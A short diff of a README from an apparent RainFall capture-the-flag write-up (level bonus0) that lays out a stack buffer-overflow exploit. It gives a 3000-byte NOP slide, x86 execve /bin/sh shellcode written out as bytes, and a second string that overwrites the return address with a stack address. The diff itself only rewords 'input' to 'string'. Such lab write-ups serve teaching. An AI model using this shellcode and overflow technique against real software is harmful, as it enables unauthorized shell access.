anyaschukin/RainFall/bonus0/README.md

 ```
 The buffer starts at ```0xbfffe640```.
 We will create a large NOP slide leading to our malicious code, so lets overwrite EIP wih an address somewhere on the NOP slide, let's say buffer + 100 ```0xbfffe6a4``` = "\xa4\xe6\xff\xbf".

-So we want to craft our first input:
+So we want to craft our first string:
 1. A large NOP slide buffer leading to our malicious code - ```'\x90' * 3000```
 2. our malicious shell code - ```\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80```

-And our second input:
+And our second string:
 1. A buffer until we reach EIP - ```'B' * 14```
 2. Address on NOP slide leading to our malicious code - ```\xa4\xe6\xff\xbf```
 3. buffer single byte - ```'B'```